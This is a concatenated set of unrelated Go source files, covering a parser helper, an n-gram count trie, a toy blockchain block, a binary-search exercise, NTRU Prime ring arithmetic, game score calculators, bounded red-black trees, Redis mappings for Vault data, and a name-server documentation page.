// upstream) if the stream errors or the lexeme fails the predicate.
func (p parser) expectFrom(c func(token.Token) bool) lexer.Lexeme {
	lexeme, err := p.stream.Next()
	if err != nil {
		panic(err)
	} else if !c(lexeme.Token) {
		panic(fmt.Errorf("Unexpected %v", lexeme.Token))
	}
	return lexeme
}
// expect consumes and returns the next lexeme, panicking (recovered
// upstream) if the stream errors or the lexeme is not t.
func (p parser) expect(t token.Token) lexer.Lexeme {
	lexeme, err := p.stream.Next()
	if err != nil {
		panic(err)
	} else if lexeme.Token != t {
		panic(fmt.Errorf("Expected %v, got %v", t, lexeme.Token))
	}
	return lexeme
}
// Gets the next non-whitespace token: newlines are skipped, and the
// first non-newline lexeme must be t or the function panics.
func (p parser) nextConcrete(t token.Token) lexer.Lexeme {
	lexeme, err := p.stream.Next()
	for lexeme.Token == token.Newline {
		// NOTE(review): err is overwritten on each Next; only the error
		// paired with the final lexeme is inspected below.
		lexeme, err = p.stream.Next()
	}
	if err != nil {
		panic(err)
	} else if lexeme.Token != t {
		panic(fmt.Errorf("Expected %v, got %v", t, lexeme.Token))
	}
	return lexeme
}
package lm
import "errors"
// WordCount is the occurrence count recorded for a corresponding path.
type WordCount = uint32
// TrieIterator is a callback that is called for each counted path of the
// given trie; returning a non-nil error aborts the walk.
type TrieIterator = func(path Sentence, count WordCount) error
// CountTrie represents a data structure for counting ngrams.
type CountTrie interface {
	// Put increments WordCount for last element of given sequence.
	Put(sentence Sentence, count WordCount)
	// Walk iterates through trie and calls walker function on each element.
	Walk(walker TrieIterator) error
}
// ErrInvalidIndex tells that there is no data for the provided index.
var ErrInvalidIndex = errors.New("index is not exists")
// NewCountTrie creates a new instance of CountTrie with an empty root
// node and an empty token-interning table.
func NewCountTrie() CountTrie {
	return &countTrie{
		root: &node{
			children: make(childrenTable),
			count: 0,
		},
		depth: 0,
		table: map[Token]uint32{},
		holder: []Token{},
	}
}
// countTrie implements a Trie data structure
type countTrie struct {
	// root is the top-level node of the trie.
	root *node
	// depth is the length of the longest sentence ever inserted.
	depth int
	// table interns tokens to compact uint32 ids.
	table map[Token]uint32
	// holder maps ids back to tokens (slice index == id).
	holder []Token
}
// node represents a trie element; children is nil until first use.
type node struct {
	children childrenTable
	count WordCount
}
// childrenTable maps interned token ids to the children of a node.
type childrenTable map[uint32]*node
// Put increments WordCount for the last element of the given sequence,
// creating intermediate nodes along the path as needed.
func (t *countTrie) Put(sentence Sentence, count WordCount) {
	// Track the longest sentence so Walk can size its scratch path.
	if len(sentence) > t.depth {
		t.depth = len(sentence)
	}
	n := t.root
	for _, word := range sentence {
		w := t.mapToUint32(word)
		child := n.children[w]
		if child == nil {
			// Children tables are allocated lazily to keep leaves small.
			if n.children == nil {
				n.children = make(childrenTable)
			}
			child = &node{
				children: nil,
				count: 0,
			}
			n.children[w] = child
		}
		n = child
	}
	n.count += count
}
// Walk iterates through the trie and calls the walker function on each
// counted path. Iterator and lookup errors are raised via panic inside
// iterate and recovered here.
func (t *countTrie) Walk(walker TrieIterator) (err error) {
	if t.depth == 0 {
		return nil
	}
	defer func() {
		if r := recover(); r != nil {
			// NOTE(review): the comma-ok assertion means a non-error panic
			// value yields err == nil — confirm iterate only panics with
			// error values.
			err, _ = r.(error)
		}
	}()
	path := make([]Token, t.depth)
	t.root.iterate(t, 0, path, walker)
	return err
}
// mapToUint32 maps the given token to a compact index, interning it on
// first sight.
func (t *countTrie) mapToUint32(token Token) uint32 {
	index, ok := t.table[token]
	if !ok {
		index = uint32(len(t.holder))
		t.table[token] = index
		t.holder = append(t.holder, token)
	}
	return index
}
// mapFromUint32 restores the token interned under the given index, or
// returns ErrInvalidIndex when the index was never assigned.
func (t *countTrie) mapFromUint32(index uint32) (Token, error) {
	if index < uint32(len(t.holder)) {
		return t.holder[index], nil
	}
	return UnknownWordSymbol, ErrInvalidIndex
}
// iterate recursively visits the subtree rooted at n, invoking the
// iterator on every path whose node carries a non-zero count. Iterator
// and id-lookup errors are propagated by panicking (recovered in Walk).
func (n *node) iterate(trie *countTrie, depth int, path []Token, iterator TrieIterator) {
	if n.count > 0 {
		if err := iterator(path[:depth], n.count); err != nil {
			panic(err)
		}
	}
	if n.children == nil {
		return
	}
	for w, child := range n.children {
		token, err := trie.mapFromUint32(w)
		if err != nil {
			panic(err)
		}
		path[depth] = token
		child.iterate(trie, depth+1, path, iterator)
	}
}
package blockchain
import (
"bytes"
"crypto/sha256"
"encoding/gob"
"encoding/hex"
"encoding/json"
"github.com/samuelvl/blockchain-lab/pkg/pow"
)
// Difficulty of the hashcash algorithm to compute the nonce. The closer to 256,
// the harder to find a nonce. (Presumably the number of leading zero bits
// required — see the pow package.)
const Difficulty uint = 16
// Block represents the simplest element of the chain. It stores some data,
// its corresponding hash and the hash from the previous block.
// The previous hash will be empty if it is the first block of the chain.
type Block struct {
	Data []byte `json:"data"`
	Hash string `json:"hash"`
	PrevHash string `json:"prevHash"`
	Nonce int32 `json:"nonce"` // counter found by the proof-of-work search
}
// NewBlock returns a block with its corresponding hash, mined at the
// package Difficulty.
// NOTE(review): the error returned by Mine is discarded here — confirm
// whether a failed proof-of-work should be surfaced to the caller.
func NewBlock(data []byte, prevHash string) *Block {
	block := Block{
		Data: data,
		Hash: "",
		PrevHash: prevHash,
		Nonce: 0,
	}
	block.ComputeHash()
	block.Mine()
	return &block
}
// FirstBlock returns the first block of the chain, built from the literal
// "Genesis" string and an empty previous hash.
func FirstBlock() *Block {
	return NewBlock([]byte("Genesis"), "")
}
// ComputeHash computes the block's hash as the hex-encoded sha256 of the
// block data immediately followed by the previous hash (no separator):
// https://datatracker.ietf.org/doc/html/rfc6234
func (b *Block) ComputeHash() {
	payload := make([]byte, 0, len(b.Data)+len(b.PrevHash))
	payload = append(payload, b.Data...)
	payload = append(payload, b.PrevHash...)
	sum := sha256.Sum256(payload)
	b.Hash = hex.EncodeToString(sum[:])
}
// Mine will recompute the block's hash using the Proof of Work "hashcat"
// algorithm: a nonce is searched for the current hash at the package
// Difficulty and the block's hash and nonce are replaced with the result.
func (b *Block) Mine() error {
	nonce, err := pow.FindNonce([]byte(b.Hash), Difficulty)
	if err != nil {
		return err
	}
	// Presumably nonce.Payload is the winning hash produced by the PoW
	// search — TODO confirm against the pow package.
	b.Hash = hex.EncodeToString(nonce.Payload)
	b.Nonce = nonce.Value
	return nil
}
// Serialize converts a block into a gob-encoded slice of bytes.
func (b *Block) Serialize() ([]byte, error) {
	var buf bytes.Buffer
	if err := gob.NewEncoder(&buf).Encode(b); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}
// Deserialize decodes a gob-encoded slice of bytes (as produced by
// Serialize) into the receiver, returning any decoding error.
func (b *Block) Deserialize(data []byte) error {
	return gob.NewDecoder(bytes.NewReader(data)).Decode(b)
}
// String prints the block in json format.
// NOTE(review): the error from json.MarshalIndent is ignored; on failure an
// empty string is returned.
func (b Block) String() string {
	jsonBlock, _ := json.MarshalIndent(b, "", " ")
	return string(jsonBlock)
} | pkg/blockchain/block.go | 0.832373 | 0.405478 | block.go | starcoder |
package main
import "fmt"
/*
Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array.
Example 1:
Input: [1,3,5,6], 5
Output: 2
Example 2:
Input: [1,3,5,6], 2
Output: 1
Example 3:
Input: [1,3,5,6], 7
Output: 4
Example 4:
Input: [1,3,5,6], 0
Output: 0
给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。
你可以假设数组中无重复元素。
示例 1:
输入: [1,3,5,6], 5
输出: 2
示例 2:
输入: [1,3,5,6], 2
输出: 1
示例 3:
输入: [1,3,5,6], 7
输出: 4
示例 4:
输入: [1,3,5,6], 0
输出: 0
*/
// 解法一:这题是简单题,对时间复杂度没有要求,所以用普通的遍历也可以
// 时间复杂度O(n) 空间复杂度O(1)
/*func searchInsert(nums []int, target int) int {
numsLen := len(nums)
if numsLen == 0 || nums[0] > target {
return 0
}
if nums[0] == target {
return 0
}
for i := 0; i < numsLen-1; i++ {
if nums[i] == target {
return i
} else if nums[i] < target && target <= nums[i+1] {
return i + 1
}
}
return numsLen
}
*/
// 解法一简化一下
/*
func searchInsert(nums []int, target int) int {
numsLen := len(nums)
for i := 0; i < numsLen; i++ {
if nums[i] >= target {
return i
}
}
return numsLen
}
*/
// 解法二 运用二分查找,
// 先把查找的范围简化一下,排除不在数组范围的情况
/*Runtime: 4 ms, faster than 100.00% of Go online submissions for Search Insert Position.
Memory Usage: 3 MB, less than 100.00% of Go online submissions for Search Insert Position.*/
// binSearch returns the index of target within the sorted range
// nums[low..high], or, when target is absent, the index at which it would be
// inserted to keep the slice sorted.
//
// The previous recursive version contained a dead branch
// (target > nums[mid]-1 && target < nums[mid] can never hold for integers)
// and could index nums[mid+1] out of range; this iterative lower-bound form
// is bounds-safe for any low <= high+1 and runs in O(log n) with O(1) space.
func binSearch(nums []int, low, high, target int) int {
	for low <= high {
		// Overflow-safe midpoint.
		mid := low + (high-low)/2
		switch {
		case nums[mid] == target:
			return mid
		case nums[mid] < target:
			low = mid + 1
		default:
			high = mid - 1
		}
	}
	// low is the first index whose value exceeds target: the insert position.
	return low
}
// searchInsert returns the index of target in the sorted slice nums, or the
// index at which target would be inserted to keep nums sorted.
// It is self-contained and safe for all inputs, including an empty slice
// (which yields 0), and runs in O(log n) time with O(1) space.
func searchInsert(nums []int, target int) int {
	low, high := 0, len(nums)-1
	for low <= high {
		// Overflow-safe midpoint.
		mid := low + (high-low)/2
		switch {
		case nums[mid] == target:
			return mid
		case nums[mid] < target:
			low = mid + 1
		default:
			high = mid - 1
		}
	}
	// low is the first index whose value exceeds target: the insert position.
	return low
}
func main() {
	// input := []int{1, 3, 5, 6}
	input := []int{1}
	// Expected output: 0 (target 1 is found at index 0).
	fmt.Println(searchInsert(input, 1))
} | Programs/035Search Insert Position/035Search Insert Position.go | 0.568176 | 0.656032 | 035Search Insert Position.go | starcoder |
// This file implements operations in Rq, a univariate quotient polynomial
// ring over GF(q) with modulus x^761 + 4590*x + 4590. It is a port of the
// public domain, C reference implementation.
package rq
import (
"github.com/companyzero/sntrup4591761/rq/modq"
"github.com/companyzero/sntrup4591761/rq/vector"
)
// swapInt swaps x and y if mask is -1. If mask is 0, x and y retain
// their original values.
// The XOR-with-mask formulation is branch-free, keeping the operation
// constant-time — deliberate in this cryptographic code. mask must be
// exactly 0 or -1 (all bits set); any other value mixes the two operands.
func swapInt(x, y *int, mask int) {
	t := mask & (*x ^ *y)
	*x ^= t
	*y ^= t
}
// smallerMask compares x and y, returning -1 if y > x, and 0 otherwise.
// Branch-free (constant-time) via an arithmetic right shift of the sign of
// x-y. For the small operands used in this package (degrees at most 761,
// so |x-y| < 2^31) the shifted result is exactly -1 or 0.
func smallerMask(x, y int) int {
	return (x - y) >> 31
}
// Reciprocal3 produces the inverse r of a polynomial 3*s in Rq.
// If s is not invertible, Reciprocal3 returns -1, and 0 otherwise.
//
// This is a constant-time, fixed-iteration extended-Euclid style inversion
// ported from the C reference implementation: the loop always runs exactly
// 2*761+1 times and all conditional updates are done with -1/0 masks
// (smallerMask, swapInt, vector.Swap) rather than branches.
func Reciprocal3(r *[761]int16, s *[761]int8) int {
	// f starts as the modulus of Rq.
	f := new([761 + 1]int16)
	f[0] = -1
	f[1] = -1
	f[761] = 1
	// g starts as 3*s
	g := new([761 + 1]int16)
	for i := 0; i < 761; i++ {
		g[i] = int16(3 * s[i])
	}
	// d and e track (bounds on) the degrees of f and g.
	d := 761
	e := 761
	loops := 2*761 + 1
	u := make([]int16, loops+1)
	v := make([]int16, loops+1)
	v[0] = 1
	for i := 0; i < loops; i++ {
		// c = (lc(g)/lc(f)) % 3
		c := modq.Quotient(g[761], f[761])
		// g = g - f*c; g <<= 1
		vector.MinusProduct(g[:], 761+1, g[:], f[:], c)
		vector.Shift(g[:], 761+1)
		// v = v - u*c
		vector.MinusProduct(v, loops+1, v, u, c)
		vector.Shift(v, loops+1)
		// swap (e,d), (f,g), and (u,v) if d > e and lc(g) != 0
		e--
		m := smallerMask(e, d) & modq.MaskSet(g[761])
		swapInt(&e, &d, m)
		vector.Swap(f[:], g[:], 761+1, m)
		vector.Swap(u, v, loops+1, m)
	}
	// Scale u by the reciprocal of f's leading coefficient to normalize.
	vector.Product(r[:], 761, u[761:], modq.Reciprocal(f[761]))
	// 0 when the inverse exists (d == 0), -1 otherwise.
	return smallerMask(0, d)
}
// Round3 rounds each coefficient of f to the nearest multiple of 3 in the
// shifted representation used here (offset by 2295), storing the result in h.
// The expression ((21846*(v+2295)+32768)>>16) is a branch-free fixed-point
// division by 3 with rounding (21846 ≈ 2^16/3), keeping the whole pass
// constant-time.
func Round3(h, f *[761]int16) {
	for i := 0; i < 761; i++ {
		h[i] = int16(((21846*int32(f[i]+2295)+32768)>>16)*3 - 2295)
	}
}
// Mult returns the product h of f and g in Rq.
//
// It first computes the full schoolbook product fg of degree < 2*761-1,
// then reduces modulo the ring polynomial: each high coefficient fg[i]
// (i >= 761) is folded into fg[i-761] and fg[i-761+1], which corresponds to
// the relation x^761 = x + 1 over GF(q) (equivalently the stated modulus
// x^761 + 4590*x + 4590, since 4590 ≡ -1 mod q).
func Mult(h, f *[761]int16, g *[761]int8) {
	fg := new([761*2 - 1]int16)
	// Low half of the schoolbook product: coefficients 0..760.
	for i := 0; i < 761; i++ {
		r := int16(0)
		for j := 0; j <= i; j++ {
			r = modq.PlusProduct(r, f[j], int16(g[i-j]))
		}
		fg[i] = r
	}
	// High half: coefficients 761..2*761-2.
	for i := 761; i < 761*2-1; i++ {
		r := int16(0)
		for j := i - 761 + 1; j < 761; j++ {
			r = modq.PlusProduct(r, f[j], int16(g[i-j]))
		}
		fg[i] = r
	}
	// Reduction: fold x^i (i >= 761) down using x^761 = x + 1.
	for i := 761*2 - 2; i >= 761; i-- {
		fg[i-761] = modq.Sum(fg[i-761], fg[i])
		fg[i-761+1] = modq.Sum(fg[i-761+1], fg[i])
	}
	for i := 0; i < 761; i++ {
		h[i] = fg[i]
	}
} | rq/rq.go | 0.733165 | 0.44089 | rq.go | starcoder |
package wow
// ScoreCalculator contains methods for calculating a character's score related to specific
// properties of a character.
type ScoreCalculator interface {
	// Calculate returns the score contribution derived from the given character.
	Calculate(Character) int
}
// -- Aggregate score calculator.

// AggregateScoreCalculator ties together other score calculators and provides
// a single combined score for all of them.
type AggregateScoreCalculator struct {
	calculators []ScoreCalculator
}

// AddCalculator registers an additional score calculator whose result will be
// included in the aggregate.
func (c *AggregateScoreCalculator) AddCalculator(calculator ScoreCalculator) {
	c.calculators = append(c.calculators, calculator)
}

// Calculate sums the scores produced by every registered calculator.
func (c *AggregateScoreCalculator) Calculate(character Character) int {
	total := 0
	for _, calc := range c.calculators {
		total += calc.Calculate(character)
	}
	return total
}
// -- Achievement score calculator.

// AchievementScoreCalculator calculates a character's achievement score,
// based on the total number of achievement points.
type AchievementScoreCalculator struct{}

// Calculate awards half of the character's total achievement points
// (integer division).
func (c AchievementScoreCalculator) Calculate(character Character) int {
	points := character.AchievementPoints
	return points / 2
}
// -- Item score calculator.

// ItemsScoreCalculator calculates a character's items score, based on item
// level and quality.
type ItemsScoreCalculator struct{}

// Calculate sums the score of every equipped item slot. A main-hand weapon
// with no off-hand equipped is treated as two-handed and counts double.
func (c ItemsScoreCalculator) Calculate(character Character) int {
	items := character.Items
	weighting := 1
	slots := []Item{
		items.Head, items.Neck, items.Shoulder, items.Back, items.Chest,
		items.Wrist, items.Hands, items.Waist, items.Legs, items.Feet,
		items.Finger1, items.Finger2, items.Trinket1, items.Trinket2,
	}
	var score int
	for _, slot := range slots {
		score += calculateItemScore(slot, weighting)
	}
	// 2-handed weapons should have double the score.
	mainHandWeighting := 2
	if items.OffHand.ID != 0 {
		mainHandWeighting = weighting
		score += calculateItemScore(items.OffHand, weighting)
	}
	score += calculateItemScore(items.MainHand, mainHandWeighting)
	return score
}
// calculateItemScore scores a single item: its item level, scaled by the
// given weighting, multiplied by its quality.
func calculateItemScore(item Item, weighting int) int {
	weighted := item.ItemLevel * weighting
	return weighted * item.Quality
}
// -- Professions score calculator.

// ProfessionsScoreCalculator calculates a character's professions score.
type ProfessionsScoreCalculator struct{}

// Calculate scores primary professions with weight 30 and secondary
// professions with weight 10.
func (c ProfessionsScoreCalculator) Calculate(character Character) int {
	primary := calculateProfessionsScore(character.Professions.Primary, 30)
	secondary := calculateProfessionsScore(character.Professions.Secondary, 10)
	return primary + secondary
}
// calculateProfessionsScore takes a collection of professions and calculates
// a score with the given weighting. Each profession contributes its
// completion percentage (rank out of max rank, 0-100) multiplied by the
// weighting. Professions with an unknown (zero) max rank are skipped to
// avoid dividing by zero.
func calculateProfessionsScore(professions []Profession, weighting int) int {
	var score int
	for _, profession := range professions {
		if profession.MaxRank == 0 {
			continue
		}
		// Multiply before dividing: the previous (100/MaxRank)*Rank form
		// truncated to zero for any profession with MaxRank > 100 and lost
		// precision everywhere else.
		score += (profession.Rank * 100 / profession.MaxRank) * weighting
	}
	return score
}
// -- Progression score calculator.

// ProgressionScoreCalculator calculates a character's raid-progression score.
type ProgressionScoreCalculator struct{}

// Calculate awards 100/200/300/400 points per LFR/normal/heroic/mythic raid
// clear respectively, summed over all raids.
func (c ProgressionScoreCalculator) Calculate(character Character) int {
	total := 0
	for _, raid := range character.Progression.Raids {
		total += 100*raid.LFRClears +
			200*raid.NormalClears +
			300*raid.HeroicClears +
			400*raid.MythicClears
	}
	return total
} | step2/modules/wow/score-calculator.go | 0.825062 | 0.560914 | score-calculator.go | starcoder |
package special
import "github.com/aegoroff/godatastruct/rbtree"
// maxTree represents Red-black search binary tree
// that stores only limited size of max possible values
type maxTree struct {
	// tree contains underlying Red-black search binary tree
	tree rbtree.RbTree
	// size is the maximum number of nodes the tree may hold.
	size int64
}

// Root returns the root node of the underlying tree.
func (t *maxTree) Root() *rbtree.Node {
	return t.tree.Root()
}

// Len returns the current number of nodes in the tree.
func (t *maxTree) Len() int64 {
	return t.tree.Len()
}

// Insert inserts node into tree which size is limited
// Only <size> max nodes will be in the tree
// When the tree is full, c is inserted only if it is greater than the current
// minimum, which is then evicted to keep the size bound.
// NOTE(review): if size is 0, min is taken from an empty tree and min.Key()
// would be evaluated — confirm callers always construct with a positive size.
func (t *maxTree) Insert(c rbtree.Comparable) {
	min := t.tree.Minimum()
	if t.tree.Len() < t.size || min.Key().Less(c) {
		if t.Len() == t.size {
			t.Delete(min.Key())
		}
		t.tree.Insert(c)
	}
}

// ReplaceOrInsert behaves like Insert but delegates replacement of an equal
// key to the underlying tree, returning the replaced value (nil when nothing
// was replaced or when c was rejected as too small).
// NOTE(review): when the tree is full and c equals the current minimum key,
// c is rejected rather than replacing the equal element — confirm intended.
func (t *maxTree) ReplaceOrInsert(c rbtree.Comparable) rbtree.Comparable {
	min := t.tree.Minimum()
	if t.tree.Len() < t.size || min.Key().Less(c) {
		if t.Len() == t.size {
			t.Delete(min.Key())
		}
		return t.tree.ReplaceOrInsert(c)
	}
	return nil
}

// Delete removes the node with key c; it reports whether a node was removed.
func (t *maxTree) Delete(c rbtree.Comparable) bool {
	return t.tree.Delete(c)
}

// DeleteAll removes all nodes with key c; it reports whether any were removed.
func (t *maxTree) DeleteAll(c rbtree.Comparable) bool {
	return t.tree.DeleteAll(c)
}

// Search delegates to the underlying tree.
func (t *maxTree) Search(value rbtree.Comparable) (rbtree.Comparable, bool) {
	return t.tree.Search(value)
}

// Floor delegates to the underlying tree.
func (t *maxTree) Floor(value rbtree.Comparable) (rbtree.Comparable, bool) {
	return t.tree.Floor(value)
}

// Ceiling delegates to the underlying tree.
func (t *maxTree) Ceiling(value rbtree.Comparable) (rbtree.Comparable, bool) {
	return t.tree.Ceiling(value)
}

// SearchAll delegates to the underlying tree.
func (t *maxTree) SearchAll(value rbtree.Comparable) []rbtree.Comparable {
	return t.tree.SearchAll(value)
}

// SearchNode delegates to the underlying tree.
func (t *maxTree) SearchNode(value rbtree.Comparable) (*rbtree.Node, bool) {
	return t.tree.SearchNode(value)
}

// Minimum returns the node with the smallest key.
func (t *maxTree) Minimum() *rbtree.Node {
	return t.tree.Minimum()
}

// Maximum returns the node with the largest key.
func (t *maxTree) Maximum() *rbtree.Node {
	return t.tree.Maximum()
}

// OrderStatisticSelect delegates to the underlying tree.
func (t *maxTree) OrderStatisticSelect(i int64) (*rbtree.Node, bool) {
	return t.tree.OrderStatisticSelect(i)
}
// minTree represents Red-black search binary tree
// that stores only limited size of min possible values
type minTree struct {
	// tree contains underlying Red-black search binary tree
	tree rbtree.RbTree
	// size is the maximum number of nodes the tree may hold.
	size int64
}

// Root returns the root node of the underlying tree.
func (t *minTree) Root() *rbtree.Node {
	return t.tree.Root()
}

// Len returns the current number of nodes in the tree.
func (t *minTree) Len() int64 {
	return t.tree.Len()
}

// Insert inserts node into tree which size is limited
// Only <size> min nodes will be in the tree
// When the tree is full, c is inserted only if it is not greater than the
// current maximum, which is then evicted to keep the size bound.
func (t *minTree) Insert(c rbtree.Comparable) {
	max := t.tree.Maximum()
	if t.tree.Len() < t.size || !max.Key().Less(c) {
		if t.tree.Len() == t.size {
			t.tree.Delete(max.Key())
		}
		t.tree.Insert(c)
	}
}

// ReplaceOrInsert behaves like Insert but delegates replacement of an equal
// key to the underlying tree, returning the replaced value (nil when nothing
// was replaced or when c was rejected as too large).
func (t *minTree) ReplaceOrInsert(c rbtree.Comparable) rbtree.Comparable {
	max := t.tree.Maximum()
	if t.tree.Len() < t.size || !max.Key().Less(c) {
		if t.tree.Len() == t.size {
			t.tree.Delete(max.Key())
		}
		return t.tree.ReplaceOrInsert(c)
	}
	return nil
}

// Delete removes the node with key c; it reports whether a node was removed.
func (t *minTree) Delete(c rbtree.Comparable) bool {
	return t.tree.Delete(c)
}

// DeleteAll removes all nodes with key c; it reports whether any were removed.
func (t *minTree) DeleteAll(c rbtree.Comparable) bool {
	return t.tree.DeleteAll(c)
}

// Search delegates to the underlying tree.
func (t *minTree) Search(value rbtree.Comparable) (rbtree.Comparable, bool) {
	return t.tree.Search(value)
}

// Floor delegates to the underlying tree.
func (t *minTree) Floor(value rbtree.Comparable) (rbtree.Comparable, bool) {
	return t.tree.Floor(value)
}

// Ceiling delegates to the underlying tree.
func (t *minTree) Ceiling(value rbtree.Comparable) (rbtree.Comparable, bool) {
	return t.tree.Ceiling(value)
}

// SearchAll delegates to the underlying tree.
func (t *minTree) SearchAll(value rbtree.Comparable) []rbtree.Comparable {
	return t.tree.SearchAll(value)
}

// SearchNode delegates to the underlying tree.
func (t *minTree) SearchNode(value rbtree.Comparable) (*rbtree.Node, bool) {
	return t.tree.SearchNode(value)
}

// Minimum returns the node with the smallest key.
func (t *minTree) Minimum() *rbtree.Node {
	return t.tree.Minimum()
}

// Maximum returns the node with the largest key.
func (t *minTree) Maximum() *rbtree.Node {
	return t.tree.Maximum()
}

// OrderStatisticSelect delegates to the underlying tree.
func (t *minTree) OrderStatisticSelect(i int64) (*rbtree.Node, bool) {
	return t.tree.OrderStatisticSelect(i)
}

// NewMaxTree creates new fixed size tree that stores <sz> max values
func NewMaxTree(sz int64) rbtree.RbTree {
	return &maxTree{
		tree: rbtree.New(),
		size: sz,
	}
}

// NewMinTree creates new fixed size tree that stores <sz> min values
func NewMinTree(sz int64) rbtree.RbTree {
	return &minTree{
		tree: rbtree.New(),
		size: sz,
	}
} | rbtree/special/fixed_tree.go | 0.827096 | 0.439687 | fixed_tree.go | starcoder |
package redis
import (
"plutus/vault"
)
// RefreshUserToGroups refreshes the User to Group and the Group to User mappings in the database
// It first drops every existing entry under both prefixes for the namespace,
// then rebuilds the two-way mapping by resolving each group member's entity
// id to its alias (user) name.
func (c *Client) RefreshUserToGroups(data *vault.Data) error {
	namespace := data.Namespace
	c.deleteAllWithAnyPrefixes(namespace, PrefixUsrToVgr, PrefixVgrToUsr)
	groups := data.Groups
	aliases := data.Aliases
	for grpName, group := range groups {
		memberIDS := group.MemberEntityIds
		for _, mID := range memberIDS {
			// Resolve the member's entity id to a human-readable user name.
			username := aliases[mID].Name
			c.sAdd(namespace, PrefixUsrToVgr, username, grpName)
			c.sAdd(namespace, PrefixVgrToUsr, grpName, username)
		}
	}
	return nil
}
// RefreshGroupToPolicies refreshes the Group to Policy and the Policy to
// Group mappings in the database: it clears both prefixes for the namespace,
// then rewrites the two-way mapping for every group/policy pair.
func (c *Client) RefreshGroupToPolicies(data *vault.Data) error {
	ns := data.Namespace
	c.deleteAllWithAnyPrefixes(ns, PrefixVgrToPol, PrefixPolToVgr)
	for name, grp := range data.Groups {
		for _, policy := range grp.Policies {
			c.sAdd(ns, PrefixVgrToPol, name, policy)
			c.sAdd(ns, PrefixPolToVgr, policy, name)
		}
	}
	return nil
}
// RefreshUserToEntity refreshes the User to Entity and the Entity to User
// mappings in the database: it clears both prefixes for the namespace, then
// rewrites the two-way mapping between each entity id and its alias name.
func (c *Client) RefreshUserToEntity(data *vault.Data) error {
	ns := data.Namespace
	c.deleteAllWithAnyPrefixes(ns, PrefixUsrToEnt, PrefixEntToUsr)
	for entityID := range data.Entities {
		username := data.Aliases[entityID].Name
		c.set(ns, PrefixUsrToEnt, username, entityID)
		c.set(ns, PrefixEntToUsr, entityID, username)
	}
	return nil
}
// RefreshEntityToPolicies refreshes the Entity to Policy and the Policy to
// Entity mappings in the database: it clears both prefixes for the
// namespace, then rewrites the two-way mapping for every entity/policy pair.
func (c *Client) RefreshEntityToPolicies(data *vault.Data) error {
	namespace := data.Namespace
	c.deleteAllWithAnyPrefixes(namespace, PrefixEntToPol, PrefixPolToEnt)
	entities := data.Entities
	for entityID, entity := range entities {
		policies := entity.Policies
		for _, policyName := range policies {
			c.sAdd(namespace, PrefixEntToPol, entityID, policyName)
			c.sAdd(namespace, PrefixPolToEnt, policyName, entityID)
		}
	}
	return nil
}
// RefreshUserToExternalGroups refreshes the User to ExternalGroupName mapping in the database
// Only those external groups are refreshed that are a part of the vault roles
//
// Bug fix: the previous version declared `members, err := ...` inside the
// cache-miss branch, which shadowed the outer `members` variable — the outer
// variable stayed nil, so freshly fetched (uncached) groups were never
// written to the database. Membership is now assigned to a single variable.
func (c *Client) RefreshUserToExternalGroups(data *vault.Data) error {
	namespace := data.Namespace
	c.deleteAllWithAnyPrefixes(namespace, PrefixUsrToEgr, PrefixEgrToUsr)
	membersCache := make(map[string][]string) // external group name -> member names
	for _, role := range data.Roles {
		externalGroup := role.ExternalGroupName
		members, ok := membersCache[externalGroup]
		if !ok {
			var err error
			members, err = c.groupsReader.Members(externalGroup)
			if err != nil {
				return err
			}
			membersCache[externalGroup] = members
		}
		for _, member := range members {
			c.sAdd(namespace, PrefixUsrToEgr, member, externalGroup)
			c.sAdd(namespace, PrefixEgrToUsr, externalGroup, member)
		}
	}
	return nil
}
// RefreshExternalGroupToRoles refreshes the ExternalGroupName to Role mapping in the database
// Only those external groups are refreshed that are a part of the vault roles
func (c *Client) RefreshExternalGroupToRoles(data *vault.Data) error {
	namespace := data.Namespace
	c.deleteAllWithAnyPrefixes(namespace, PrefixEgrToRol, PrefixRolToEgr)
	roles := data.Roles
	for roleName, role := range roles {
		externalGroup := role.ExternalGroupName
		c.sAdd(namespace, PrefixEgrToRol, externalGroup, roleName)
		c.sAdd(namespace, PrefixRolToEgr, roleName, externalGroup)
	}
	return nil
}
// RefreshRoleToPolicies refreshes the Role to Policy and the Policy to Role
// mappings in the database: it clears both prefixes for the namespace, then
// rewrites the two-way mapping for every role/policy pair.
func (c *Client) RefreshRoleToPolicies(data *vault.Data) error {
	namespace := data.Namespace
	c.deleteAllWithAnyPrefixes(namespace, PrefixRolToPol, PrefixPolToRol)
	roles := data.Roles
	for roleName, role := range roles {
		policies := role.Policies
		for _, policy := range policies {
			c.sAdd(namespace, PrefixRolToPol, roleName, policy)
			c.sAdd(namespace, PrefixPolToRol, policy, roleName)
		}
	}
	return nil
}
// RefreshPathToPolicy refreshes the Path To Policy mapping in the database
// It clears both prefixes for the namespace, then stores for each policy the
// encoded form of every path it grants, and for each raw path the encoded
// entries of the policies covering it.
func (c *Client) RefreshPathToPolicy(data *vault.Data) error {
	namespace := data.Namespace
	c.deleteAllWithAnyPrefixes(namespace, PrefixPatToPol, PrefixPolToPat)
	policies := data.Policies
	for policyName, policy := range policies {
		for _, path := range policy.Paths {
			encodedPath, err := path.Encode()
			if err != nil {
				return err
			}
			c.sAdd(namespace, PrefixPolToPat, policyName, encodedPath)
			// encodedPath is added to have the policy name and the capabilities
			c.sAdd(namespace, PrefixPatToPol, path.Path, encodedPath)
		}
	}
	return nil
} | redis/refresh.go | 0.679391 | 0.429908 | refresh.go | starcoder |
package api
import (
. "github.com/gocircuit/circuit/gocircuit.org/render"
)
// RenderNamePage renders the "Using name servers" documentation page by
// wrapping the static nameBody HTML in the site template.
func RenderNamePage() string {
	return RenderHtml("Using name servers", Render(nameBody, nil))
}

// nameBody is the raw HTML body of the page. It is runtime content served
// to users, so its text is kept verbatim.
const nameBody = `
<h2>Using name servers</h2>
<p>Name server elements are an easy way of creating and configuring
lightweight DNS server dynamically.
<p>To create a name server element,
use the following method of the <code>Anchor</code> interface:
<pre>
MakeNameserver(addr string) (Nameserver, error)
</pre>
<p>The creation of a new name server element results in starting
a lightweight DNS server (which is serviced by the circuit daemon itself)
on the respective host where the anchor lives.
<p>If the address argument is the empty string, the DNS server will pick
an available port to listen to. Otherwise, it will try to bind itself to <code>addr</code>.
<p>An application error may be returned if either (i) the underlying anchor is
already busy with another element, or (ii) the DNS server could not bind
to the provided address parameter.
<p>Internally, the DNS server is implemented using <a href="http://github.com/miekg/dns">github.com/miekg/dns</a>.
